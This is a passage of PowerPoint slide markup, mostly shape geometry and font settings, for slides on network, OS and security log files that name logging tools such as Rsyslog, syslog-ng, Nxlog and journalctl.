                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107825" y="41764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149375" y="19216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195295" y="4967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244601" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5916930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966236" y="4967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6012156" y="19216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053706" y="41764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6089903" y="71628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6119767" y="107825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142315" y="149375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6156564" y="195295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="244602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1222997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6156564" y="1272297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142315" y="1318214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6119767" y="1359766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6089903" y="1395968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053706" y="1425837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6012156" y="1448389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966236" y="1462642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5916930" y="1467612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244601" y="1467612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195295" y="1462642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149375" y="1448389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107825" y="1425837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71627" y="1395968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41764" y="1359766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19216" y="1318214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4967" y="1272297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1222997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="244602"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="EE63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844788" y="7257415"/>
            <a:ext cx="302895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SzPct val="110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solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>normalization</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-6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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>tool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517380" y="6096000"/>
            <a:ext cx="4411980" cy="741045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="741045">
                <a:moveTo>
                  <a:pt x="4288535" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="123444" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75384" y="9697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36147" y="36147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9697" y="75384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9697" y="665279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36147" y="704516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75384" y="730966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123444" y="740663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4288535" y="740663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336595" y="730966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4375832" y="704516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402282" y="665279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="617219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402282" y="75384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4375832" y="36147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336595" y="9697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4288535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1337797" y="6271005"/>
            <a:ext cx="77406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50">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Nxlog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643366" y="3530346"/>
            <a:ext cx="6162040" cy="2265045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2265045">
                <a:moveTo>
                  <a:pt x="0" y="377443"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2941" y="330107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11530" y="284523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25412" y="241045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44233" y="200027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67638" y="161823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95275" y="126788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126788" y="95275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161823" y="67638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200027" y="44233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241045" y="25412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284523" y="11530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330107" y="2941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="377443" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5784087" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5831424" y="2941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877008" y="11530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5920486" y="25412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5961504" y="44233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5999708" y="67638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6034743" y="95275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6066256" y="126788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6093893" y="161823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6117298" y="200027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136119" y="241045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150001" y="284523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158590" y="330107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="377443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1887219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158590" y="1934556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150001" y="1980140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136119" y="2023618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6117298" y="2064636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6093893" y="2102840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6066256" y="2137875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6034743" y="2169388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5999708" y="2197025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5961504" y="2220430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5920486" y="2239251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877008" y="2253133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5831424" y="2261722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5784087" y="2264664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="377443" y="2264664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330107" y="2261722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284523" y="2253133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241045" y="2239251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200027" y="2220430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161823" y="2197025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126788" y="2169388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95275" y="2137875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67638" y="2102840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44233" y="2064636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25412" y="2023618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11530" y="1980140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2941" y="1934556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1887219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="377443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8883777" y="4482210"/>
            <a:ext cx="510476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lr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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000" spc="-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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>handling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517380" y="2968751"/>
            <a:ext cx="4411980" cy="739140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="739139">
                <a:moveTo>
                  <a:pt x="4288789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="123190" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75223" y="9675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36068" y="36068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9675" y="75223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="123189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="615950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9675" y="663916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36068" y="703072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75223" y="729464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123190" y="739139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4288789" y="739139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336756" y="729464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4375912" y="703072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402304" y="663916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="615950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="123189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402304" y="75223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4375912" y="36068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336756" y="9675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4288789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0298430" y="3143249"/>
            <a:ext cx="285305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35">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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-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">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>syslog-ng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672589" y="6648450"/>
            <a:ext cx="6162040" cy="1466215"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="1466215">
                <a:moveTo>
                  <a:pt x="0" y="244348"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4962" y="195088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19194" y="149215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41717" y="107708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71548" y="71548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107708" y="41717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149215" y="19194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195088" y="4962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244348" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966443" y="4962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6012316" y="19194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053823" y="41717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6089983" y="71548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6119814" y="107708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142337" y="149215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6156569" y="195088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="244348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1221740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6156569" y="1270984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142337" y="1316851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6119814" y="1358357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6089983" y="1394520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053823" y="1424357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6012316" y="1446885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966443" y="1461123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917184" y="1466088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="244348" y="1466088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195088" y="1461123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149215" y="1446885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107708" y="1424357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71548" y="1394520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41717" y="1358357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19194" y="1316851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4962" y="1270984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1221740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="244348"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="EE63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872742" y="7201357"/>
            <a:ext cx="2047239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lr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Binary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-9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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>logging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546604" y="6096000"/>
            <a:ext cx="4411980" cy="741045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4411980" h="741045">
                <a:moveTo>
                  <a:pt x="4288536" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="123443" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75384" y="9697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36147" y="36147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9697" y="75384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9697" y="665279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36147" y="704516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75384" y="730966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123443" y="740663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4288536" y="740663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336595" y="730966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4375832" y="704516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402282" y="665279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="617219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4411980" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402282" y="75384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4375832" y="36147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336595" y="9697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4288536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4128261" y="6271005"/>
            <a:ext cx="124841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75">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>journalctl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92115" y="306451"/>
            <a:ext cx="62718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14">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Files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5720" y="760476"/>
            <a:ext cx="8639556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733031" y="4367784"/>
            <a:ext cx="2700655" cy="2674620"/>
            <a:chOff x="6733031" y="4367784"/>
            <a:chExt cx="2700655" cy="2674620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7181087" y="6420612"/>
              <a:ext cx="1786255" cy="622300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1786254" h="622300">
                  <a:moveTo>
                    <a:pt x="167004" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="163830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35804" y="197627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72723" y="229869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110713" y="260539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149728" y="289623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189726" y="317105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230662" y="342970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272491" y="367203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315169" y="389788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="358652" y="410711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402896" y="429956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447857" y="447508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493491" y="463351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539753" y="477471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586598" y="489852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633984" y="500480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681865" y="509338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730197" y="516411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778937" y="521685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828039" y="525144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893698" y="621792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="958087" y="525144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1007388" y="521685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056283" y="516411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104731" y="509338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1152693" y="500480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200128" y="489852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246994" y="477471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1293252" y="463351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1338861" y="447508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1383780" y="429956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427970" y="410711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471388" y="389788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513996" y="367203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1555751" y="342970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596615" y="317105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628149" y="295401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893698" y="295401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842325" y="294180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791407" y="290532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741018" y="284487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691231" y="276070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642116" y="265309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593748" y="252231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546198" y="236863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499538" y="219233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453841" y="199368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409180" y="177294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365626" y="153039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323252" y="126630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282131" y="98095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242334" y="67460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203935" y="34752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167004" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1786254" h="622300">
                  <a:moveTo>
                    <a:pt x="1620519" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1583359" y="34752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544789" y="67460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1504874" y="98095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1463680" y="126630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421275" y="153039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377724" y="177294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333092" y="199368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1287446" y="219233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240852" y="236863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193377" y="252231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1145085" y="265309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096043" y="276070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046318" y="284487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="995974" y="290532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945079" y="294180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893698" y="295401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628149" y="295401"/>
                  </a:lnTo>
